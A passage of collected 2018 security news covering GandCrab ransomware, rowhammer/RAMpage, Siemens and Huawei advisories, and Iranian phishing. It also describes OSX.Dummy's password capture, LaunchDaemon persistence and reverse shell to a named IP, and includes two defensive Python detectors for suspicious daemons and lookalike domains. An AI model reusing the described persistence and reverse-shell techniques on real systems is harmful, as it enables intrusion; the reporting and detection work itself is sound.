[-] No more wallpaper routine and no C2C. https://beta.virusbay.io/sample/browse/97a910c50171124f2cd8cfc7a4f2fa4f … pic.twitter.com/dvw604AKBG

Marcelo Rivero
@MarceloRivero
#GandCrab V4 internal version: 4.0 - seems to use now #Salsa20 stream cipher 🧐 pic.twitter.com/Op01bBC50g

4:42 AM - Jul 3, 2018
The GandCrab authors left a message in the code for Daniel J. Bernstein, the computer science professor at the University of Illinois at Chicago who created the Salsa20 algorithm:

@hashbreaker Daniel J. Bernstein let's dance salsa <3
According to malware researcher Fly, GandCrab V4 is currently being distributed through fake software crack sites.

“The ransomware distributors will hack legitimate sites and setup fake blogs that offer software crack downloads. When a user downloads and runs these cracks, they will install the GandCrab Ransomware onto the computer.” wrote Lawrence Abrams from Bleeping Computer.

Like previous variants, when GandCrab ransomware V4 is executed it will scan the computer and network shares for files to encrypt.

Lawrence added that this variant enumerates all shares on the network, not just mapped drives. Once the files are encrypted, the ransomware creates ransom notes named KRAB-DECRYPT.txt that include payment instructions. The ransom amount is currently $1,200 USD worth of DASH cryptocurrency.


The TOR payment site includes a support section where victims can send messages to the developers and request to decrypt one file for free as the proof of their abilities.

The bad news is that, at this time, victims of GandCrab V4 cannot decrypt their files for free.


Rowhammer Evolves into RAMpage Exploit, Targeting Android Phones Since 2012
4.7.2018 securityaffairs Android

This week researchers demonstrated that most Android phones released since 2012 are still vulnerable to the RAMpage attack.
In 2012, security researchers identified a bug in modern DRAM (dynamic random access memory) chips that could lead to memory corruption.

In 2015, Google Project Zero researchers demonstrated “rowhammer“, a working exploit of this attack providing privilege escalation on vulnerable Linux and Windows systems. In 2016, researchers at VUSec published Drammer, demonstrating that the rowhammer technique could be used to gain root on Android devices. Google scrambled to fix the vulnerability in 2016, but this week researchers demonstrated that those fixes are incomplete and most Android phones released since 2012 are still vulnerable to the latest iteration of the attack, known as RAMpage. Since this is a hardware vulnerability, it is very difficult to retroactively “fix.”

The problem stems from DRAM cells being packed ever more densely to increase capacity and speed. We may want computer memory to be consistent and free from corruption, but the physics involved at these tiny scales has unintended consequences.

As written in the original academic paper, “[…] as DRAM process technology scales down to smaller dimensions, it becomes more difficult to prevent DRAM cells from electrically interacting with each other. […] By reading from the same row in DRAM, we show that it is possible to corrupt data in nearby addresses.” (Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors, by Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye Lee, Donghyuk Lee, Chris Wilkerson, Konrad Lai and Onur Mutlu.) In other words, by repeatedly and rapidly reading memory in DRAM row 2, it may be possible to cause individual bits in rows 1 or 3 to flip from 1 to 0 or vice versa.

An interesting and concerning physical outcome, but it wasn’t until Google Project Zero researchers published a working exploit in 2015 that the risk became significant.


In the 2015 blog post, “Exploiting the DRAM rowhammer bug to gain kernel privileges”, Google security researchers explained that by hammering the two rows on either side of a target row (double-sided hammering), they were able to induce bit flips in the DRAM row between them. Corrupting memory with electrical interference is a neat trick, but being able to flip chosen bits is the start of a practical exploit, and the researchers demonstrated privilege escalation on Windows and Linux systems. With privilege escalation, an attacker can execute arbitrary malicious code on the target system. There are mitigations that reduce the risk from rowhammer, but they require changes to hardware and some increase power consumption and reduce performance. That may be acceptable in desktop and server environments where security concerns outweigh power consumption, but power is a prime concern on mobile devices, which were first shown to be vulnerable to rowhammer attacks in 2016.

Security researchers from VUSec in Amsterdam published a blog post in 2016 titled “Drammer: Flip Feng Shui Goes Mobile.” In this post, they described how a rowhammer attack could be used against mobile devices running Android to gain “root access” to the device. The attack can be launched “by hiding it in a malicious app that requires no permissions.” Once the attacker has root access, they have full control of the mobile device and the information on it. A patch for the Android kernel ION subsystem addressing the Drammer attack was released in November 2016. Unfortunately, the Android ecosystem still suffers from fragmentation and distribution challenges, so you can expect that many vulnerable devices have not yet received this patch. And, as we learned this week, even if you did receive the patch, you may still be vulnerable.

An international team of systems security researchers published the paper “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM”, which describes an evolution of the rowhammer attack they dub RAMpage. The paper describes RAMpage as “a set of DMA-based Rowhammer attacks against the latest Android OS, consisting of (1) a root exploit, and (2) a series of app-to-app exploit scenarios that bypass all defenses.” Acknowledging that the 2016 patch did address the “double-sided hammer” vulnerability, the researchers found that by combining an attack that exhausts all ION internal memory pools with their Flip Feng Shui exploit they were still able to gain root on the target Android device. As always, once the bad actors have root, they have access to everything on your phone.

Since the theoretical proposal in 2012, we have seen the same memory vulnerability exploited repeatedly, with greater impact and relative ease. In the RAMpage researchers’ own words, “Over the last two years, the Rowhammer bug transformed from a hard-to-exploit DRAM disturbance error into a fully weaponized attack vector.” Being hardware-based, memory attacks like these are notoriously difficult to defend against, and where a viable defence exists it usually increases costs or reduces performance, making it less likely to be deployed. We have to recognize that mobile devices are as capable as desktop computers and accept that they require similar protections, vulnerability management procedures and upgrades.

Do you consider your ability to patch and protect mobile systems when purchasing?


Siemens warns of several flaws affecting Central Plant Clocks
4.7.2018 securityaffairs ICS

Siemens is warning of six vulnerabilities in some of its SICLOCK central plant clocks, devices used to synchronize time in industrial environments; three of the flaws have been rated “critical.”

“In the event of failure or loss of reception from the primary time source, the central plant clock ensures stable continuation of the clock time, and tracking of the system time without time jumps as soon as reception is restored.” reads the Siemens official website.

The vulnerabilities have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856; three of them have been classified as critical.

“SICLOCK TC devices are affected by multiple vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, bypass the authentication, and modify the firmware of the device or the administrative client.” reads the security advisory.

One of the critical vulnerabilities tracked as CVE-2018-4851 could be exploited by attackers with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition and potentially reboot by sending it specially crafted packets.

The successful exploitation of this flaw doesn’t require user interaction.

“An attacker with network access to the device, could cause a Denial-of-Service condition by sending certain packets to the device, causing potential reboots of the device.” reads the security advisory.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed. The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

The second critical vulnerability, tracked as CVE-2018-4853, can be exploited by an attacker with access to UDP port 69 to modify the firmware on a vulnerable device.

The flaw could be exploited by an attacker to run his own code on the SICLOCK device.


The third critical issue tracked as CVE-2018-4854 can be exploited by an attacker with access to UDP port 69 to modify the administrative client stored on the device.

“An attacker with network access to port 69/udp could modify the administrative client stored on the device.” continues the advisory.

“If a legitimate user downloads and executes the modified client from the affected device, then he could obtain code execution on the client system.”

Siemens also reported a high severity vulnerability that could be exploited by a network attacker to bypass authentication.

The other issues discovered by Siemens are a medium severity flaw that could be exploited to launch a man-in-the-middle (MitM) attack and intercept unencrypted passwords stored in client configuration files, and a low severity flaw that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The flaws impacted the SICLOCK TC100 and SICLOCK TC400.

Siemens did not release firmware updates for these products because they are being phased out; the industrial giant only provided workarounds and mitigations to reduce the risk of attacks.


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs
Vulnerability

Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue, tracked as CVE-2017-17174, that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is caused by the use of an insecure encryption algorithm; a man-in-the-middle (MitM) attacker could exploit it to recover the session key and decrypt the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

RSE6500 Recording and Streaming Engine, version V500R002C00, a high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD);
SoftCo unified communications software, version V200R003C20SPCb00;
VP9660 video conferencing multipoint control unit, version V600R006C10;
Multiple versions of the eSpace U1981 IP telephony and enterprise communications universal SIP gateway.

Huawei rated the vulnerability 5.3 (medium) because it is not easy to exploit. The company has released software updates for all of the affected solutions except the SoftCo unified communications software, which has been deprecated.

Every flaw discovered in the products of Chinese and Russian firms raises alarm among governments that are already banning their solutions from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.


Ransomware and malicious crypto miners in 2016-2018
4.7.2018 Kaspersky
Ransomware
KSN Report: Ransomware and malicious cryptominers 2016-2018

Ransomware is not an unfamiliar threat. For the last few years it has been affecting the world of cybersecurity, infecting and blocking access to various devices or files and requiring users to pay a ransom (usually in Bitcoins or another widely used e-currency), if they want to regain access to their files and devices.

The term ransomware covers two main types of malware: so-called window blockers (which block the OS or browser with a pop-up window) and cryptors (which encrypt the user’s data). The term also encompasses select groups of Trojan-downloaders, namely those that tend to download encryption ransomware once a PC is infected.

Kaspersky Lab has a tradition of reporting on the evolution of ransomware – and you can find previous reports on the threat here and here.

This year, however, we came across a huge obstacle in continuing this tradition. We have found that ransomware is rapidly vanishing, and that cryptocurrency mining is starting to take its place.

The architecture of cryptocurrencies assumes that, in addition to purchasing cryptocurrency, a user can create a new currency unit (or coin) by harnessing the computational power of machines that have specialized ‘mining’ software installed on them.

Cryptocurrency mining is the process of creating these coins – it happens when various cryptocurrency transactions are verified and added to the digital blockchain ledger. The blockchain, in its turn, is a chain of successive blocks holding recorded transactions such as who has transferred bitcoins, how many, and to whom. All participants in the cryptocurrency network store the entire chain of blocks with details of all of the transactions that have ever been made, and participants continuously add new blocks to the end of the chain.

Those who add new blocks are called miners, and in the Bitcoin world, as a reward for each new block, its creator currently receives 12.5 Bitcoins. That’s approximately $30,000 according to the exchange rate on July 1, 2017. You can find out more about the mining process here.

Given the above, this report will examine what is hopefully ransomware’s last breath, in detail, along with the rise of mining. The report covers the period April 2017 to March 2018, and compares it with April 2016 – March 2017.

Main findings
The total number of users who encountered ransomware fell by almost 30%, from 2,581,026 in 2016-2017 to 1,811,937 in 2017-2018;
The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware fell by around 1 percentage point, from 3.88% in 2016-2017 to 2.80% in 2017-2018;
Among those who encountered ransomware, the proportion who encountered cryptors fell by around 3 percentage points, from 44.6% in 2016-2017 to 41.5% in 2017-2018;
The number of users attacked with cryptors almost halved, from 1,152,299 in 2016-2017 to 751,606 in 2017-2018;
The number of users attacked with mobile ransomware fell by 22.5% from 130,232 in 2016-2017 to 100,868 in 2017-2018;
The total number of users who encountered miners rose by almost 44.5% from 1,899,236 in 2016-2017 to 2,735,611 in 2017-2018;
The share of miners detected, from the overall number of threats detected, also grew from almost 3% in 2016-2017 to over 4% in 2017-2018;
The share of miners detected, from overall risk tool detections, is also on the rise – from over 5% in 2016-2017 to almost 8% in 2017-2018;
The total number of users who encountered mobile miners also increased – but at a steadier pace, growing by 9.5% from 4,505 in 2016-2017 to 4,931 in 2017-2018.


Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and WhatsApp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.


New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups, and attempt to convince them into running the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and run on the victim’s machine. Although the social-engineering trick is not particularly sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed, and Gatekeeper would normally flag and block it, but Gatekeeper only inspects files that carry the quarantine attribute browsers and mail clients set on downloads; a binary fetched and launched by a command typed into the terminal never receives that attribute, so the check is skipped.

The reason the binary is so large is that the author apparently packed in it libraries such as OpenSSL and V8, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first changes the script’s owner to root. Because it does this through sudo, the user is prompted for their password in the terminal; the malware captures the password and saves it to /tmp/dumpdummy.

Next, OSX.Dummy makes the script executable via chmod +x, moves it to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it into the LaunchDaemons directory, sets the file’s owner to root, and loads the launch daemon for persistence.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.
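The persistence step described above (a property list placed under /Library/LaunchDaemons so that launchd starts a Python script as root on every boot) leaves an artefact that can be audited offline. The Python below is an added example written for this page, not Wardle's or Verhoef's code: it parses a LaunchDaemon plist and lists the reasons it deserves review, namely a script interpreter as the program, a program path under a user-writable location, a label that is not vendor-style reverse DNS, and RunAtLoad on top of any of those. The two sample plists are constructed; the label com.startup is taken from the /tmp/com.startup.plist file name mentioned above, while the script path is invented because the page does not give it.

```python
import os
import plistlib

# Interpreters a root launch daemon rarely needs; OSX.Dummy's daemon runs a Python script.
SCRIPT_INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "perl", "osascript"}

# Locations writable without root. A daemon whose program lives here can be
# replaced by any local user and will then run as root.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/")


def program_of(job):
    """The argv launchd will run for this job, from ProgramArguments or Program."""
    if job.get("ProgramArguments"):
        return [str(a) for a in job["ProgramArguments"]]
    if job.get("Program"):
        return [str(job["Program"])]
    return []


def audit_launch_daemon(plist_bytes):
    """Return the reasons this LaunchDaemon plist deserves a look (empty list means nothing odd)."""
    job = plistlib.loads(plist_bytes)          # handles XML and binary plists
    argv = program_of(job)
    if not argv:
        return ["no Program or ProgramArguments"]
    reasons = []
    if os.path.basename(argv[0]) in SCRIPT_INTERPRETERS:
        reasons.append("root daemon runs an interpreter: " + " ".join(argv))
    for arg in argv:
        if arg.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("references user-writable path: " + arg)
    label = str(job.get("Label", ""))
    if label.count(".") < 2:
        reasons.append("label is not vendor-style reverse DNS: " + repr(label))
    if reasons and job.get("RunAtLoad"):
        reasons.append("RunAtLoad is set, so this executes on every boot")
    return reasons


def audit_directory(path="/Library/LaunchDaemons"):
    """Audit every .plist in a directory; returns {file name: reasons}. Not run on import."""
    findings = {}
    for name in sorted(os.listdir(path)):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                findings[name] = audit_launch_daemon(fh.read())
    return findings


# Constructed samples. BENIGN mimics a vendor updater; DUMMY_STYLE mimics the
# daemon described above (label from the /tmp/com.startup.plist file name,
# script path invented for the example).
BENIGN = plistlib.dumps({
    "Label": "com.example.updaterd",
    "ProgramArguments": ["/Library/Application Support/Example/updaterd", "--daemon"],
    "RunAtLoad": True,
})
DUMMY_STYLE = plistlib.dumps({
    "Label": "com.startup",
    "ProgramArguments": ["/usr/bin/python", "/Users/Shared/.cache/script.py"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("dummy-style", DUMMY_STYLE)):
        print(name, "->", audit_launch_daemon(blob) or ["ok"])
```

The checks are heuristics, not signatures: a legitimate daemon that runs a shell script will be listed too, which is the point of a review list rather than an alert. Pair the output with a check that each plist and its program are owned by root and not group- or world-writable, which cannot be done on a constructed sample and is therefore left to the reader's own run of audit_directory().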

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerability

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.


Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.


The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past few years, security researchers have linked various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and have found that they tend to share infrastructure and malware code.


Data Security Startup Enveil Unveils Homomorphic Encryption Platform
4.7.2018 securityweek Krypto

Enveil's New "ZeroReveal" Platform Enables Homomorphic Encryption to Secure Data in Use

Sensitive data exposure is classified by OWASP as the third most critical web application vulnerability. Encryption is the primary solution. But encryption is only generally available for data at rest and data in transit -- leaving the third state of data (data in use) potentially exposed. Bank card details, for example, can be stored encrypted and can be transmitted encrypted -- but they currently must be decrypted and exposed at the point of processing.

Finding some way for data to remain encrypted and secure even during processing is considered the holy grail of encryption. One method, homomorphic encryption, was first proposed in 1978, initially without any clear proof that it was possible. Today, start-up firm Enveil has launched what it describes as the first practical and scalable commercial homomorphic encryption platform, ZeroReveal.

The core technology originates from within the NSA. Enveil's CEO and founder, mathematician Ellison Anne Williams, worked on the project within the NSA as a senior researcher for 12 years. When she left in 2015 she took the technology with her, exclusively, and founded Enveil in 2016. Since then, Enveil has expanded and matured the core technology to the point of launching a commercial product.

"Continued reports of chip flaws [eg, Spectre and Meltdown] and data breaches in recent months make it clear that encrypting data at rest and in transit isn't good enough in today's volatile security environment. Organizations must eliminate the data in use security gap and do so in a way that won't negate investments in existing systems and protocols," explains Williams. "We allow you to securely use data where it is and as it is today, delivering nation-state level security -- no system overhaul required."

When people use data, they typically do so by running a search or an analytic over it. Enveil concentrates on the security posture of that search or analytic while it is being performed.

"We have two-party form factor," Williams told SecurityWeek. "From a technology standpoint, it means that we can take a search or analytic that folks will want to perform over data, and we can encrypt that, and then we can run that encrypted search over massive amounts of data anywhere, without ever decrypting anything. We never decrypt the search itself, and if the underlying data also happens to be encrypted, we don't have to decrypt that either. We accomplish this through the ZeroReveal Compute Fabric where we can encrypt the search, send that out to the data location, and that can be processed there without ever being decrypted."

This is made possible by the magic math known as homomorphic encryption. "It's been around for a while," continued Williams, "and a lot of work has gone into it. It allows you to perform operations on encrypted data as if it were unencrypted data. This is powered by the mathematical nature of homomorphic encryption. Until now it has remained computationally intensive and not practical. Our major breakthrough has been moving this holy grail from the realm of the theoretical to the realm of the practical."

ZeroReveal solves very specific use cases. "How do I go and encrypt my most sensitive data and put it securely in the cloud," said Williams, "but yet still be able to process it in its encrypted state in the cloud platform? It has become practical because of advances in the way that we use the homomorphic encryption rather than simply massive increases in compute power."

One of ZeroReveal's great strengths is that it works on existing encrypted data -- the secret resides in the homomorphically encrypted search or analytic. "We sit above the storage technology," she said. "People don't have to change the mechanism of storage or how they currently encrypt their data. This is what is new. In traditional homomorphic systems, you must have the data itself encrypted homomorphically to operate on it. We don't do that at all. It's because we're looking for bit matches rather than character matches in the underlying data. It allows us to search across any data store, encrypted or unencrypted, and encrypted with any crypto and even graphics -- it's all represented by the bit values that we search on."

The use cases are already extensive, and will only grow with the increase of big data aggregators. Consider, for example, a third-party aggregation of financial data. The very act of searching that data for specific information can highlight confidential considerations of potential M&A activity. But with the search encrypted (irrespective of whether or how the big data itself is encrypted), no outside party will know what the query was.

It would allow health organizations to anonymize and encrypt personal health data, and allow researchers to analyze the data without it ever having to be decrypted. It would allow staff to work on sensitive data from home -- or anywhere -- over the weekend without having to decrypt and copy the data to a laptop. And it clearly has huge potential to protect both data owners and data processors concerned about GDPR.

"The range of potential use cases for homomorphic encryption is vast," says Garrett Bekker, principal analyst, Information Security at 451 Research. "By focusing on the encryption-in-use space, Enveil complements data-at-rest and data-in-motion encryption to fill a gap in the overall data security landscape."

Fulton, Maryland-based Enveil was founded in 2016 by Ellison Anne Williams. It raised $4 million from investors including Bloomberg, Thomson Reuters, USAA, In-Q-Tel and DataTribe. The firm focuses solely on securing data in use, and works seamlessly with existing investments in securing data at rest and data in transit.


Iranian Charming Kitten APT group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT

Iranian APT groups continue to be very active; recently the Charming Kitten cyber spies attempted to pose as an Israeli cyber-security firm that had uncovered their previous hacking campaigns.
The Iranian Charming Kitten APT group, aka Newscaster or Newsbeef, launched spear phishing attacks against people interested in reading reports about it.

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

According to an analysis by iSIGHT Partners, the Iranian hackers used a network of fake accounts (the NEWSCASTER network) on major social networks to spy on US officials and political staff worldwide. The Charming Kitten group is also known for abusing open source security tools, including BeEF (the Browser Exploitation Framework).

The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.

ClearSky detailed the group’s activities during 2016-2017 in a report that includes information on the infrastructure used by the APT and on a new strain of malware dubbed DownPaper.

The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.

Recently, experts from the Israeli cyber-security firm ClearSky Security discovered that the Charming Kitten APT had created a rogue copy (clearskysecurity.net) of the company’s official website (clearskysec.com).


“Charming Kitten built a phishing website impersonating our company,” states ClearSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”

“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”

ClearSky Cyber Security
@ClearskySec
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.

4:15 PM - Jul 1, 2018
The experts believe they discovered the rogue website while the Iranian APT was still working on it.

“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.

The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.


ClearSky Cyber Security
@ClearskySec
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:

jewishjournal\.us
deutcshewelle\.org
deutcshewelle\.com
frostsullivan\.org

More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …

9:57 AM - Jun 12, 2018
The server was still hosting content from previous campaigns, a further clue linking it to the Iranian hacker group.
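The domains in the tweet above are textbook lookalikes: a transposition (deutcshewelle), a dropped hyphen (frostsullivan), a swapped TLD (jewishjournal.us) and a brand name extended with extra letters (clearskysecurity). The following is an added example, not ClearSky’s tooling, of the check a brand-protection or threat-intel team runs over newly registered or newly observed domains. The PROTECTED list is constructed for the demo and is not a claim about which domains these organizations really use; the candidates are the ones listed in the article, accepted in defanged form.

```python
"""Flag domains that imitate names you protect, for the lookalikes ClearSky
reported (clearskysecurity.net, deutcshewelle.org, jewishjournal.us, ...).

Added example, not ClearSky's tooling. PROTECTED is constructed for the demo
and is not a claim about which domains these organizations really use."""

# Constructed for the example: the legitimate names each fake is compared against.
PROTECTED = ["clearskysec.com", "deutschewelle.com", "jewishjournal.com", "frost-sullivan.com"]


def damerau_levenshtein(a, b):
    """Optimal-string-alignment distance: insert, delete, substitute and swap of
    two adjacent characters ('cs' -> 'sc' in deutcshewelle) each cost one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def split_domain(domain):
    """'deutcshewelle\\.org' -> ('deutcshewelle', 'org'). Accepts defanged input
    (backslash before the dot). Naive about multi-label suffixes such as .co.uk;
    use a Public Suffix List library for those."""
    clean = domain.lower().replace("\\", "").strip().rstrip(".")
    label, _, tld = clean.rpartition(".")
    return label, tld


def classify(domain, protected=PROTECTED):
    """Return [(protected_domain, reason), ...] for every protected name the
    candidate imitates; an empty list means no lookalike pattern matched."""
    label, tld = split_domain(domain)
    hits = []
    for legit in protected:
        brand, brand_tld = split_domain(legit)
        if label == brand and tld == brand_tld:
            continue  # the legitimate domain itself
        if label == brand:
            hits.append((legit, "same name, different TLD"))
        elif label.startswith(brand) and len(label) > len(brand):
            hits.append((legit, "brand name extended with '%s'" % label[len(brand):]))
        elif label.replace("-", "") == brand.replace("-", ""):
            hits.append((legit, "hyphenation changed"))
        else:
            distance = damerau_levenshtein(label, brand)
            # Tolerate roughly one edit per six characters of the brand name.
            if distance <= max(1, len(brand) // 6):
                hits.append((legit, "edit distance %d" % distance))
    return hits


if __name__ == "__main__":
    for candidate in ["clearskysecurity\\.net", "deutcshewelle\\.org", "jewishjournal\\.us",
                      "frostsullivan\\.org", "example.org"]:
        print(candidate, "->", classify(candidate) or "no match")
```

The distance threshold is deliberately tight; loosening it catches more squats but also flags unrelated short names, so in practice the output feeds an analyst queue rather than an automatic block.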

The website still appeared to be under development, so it is likely that it had not yet been used in any campaign.

As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down within hours of its discovery.

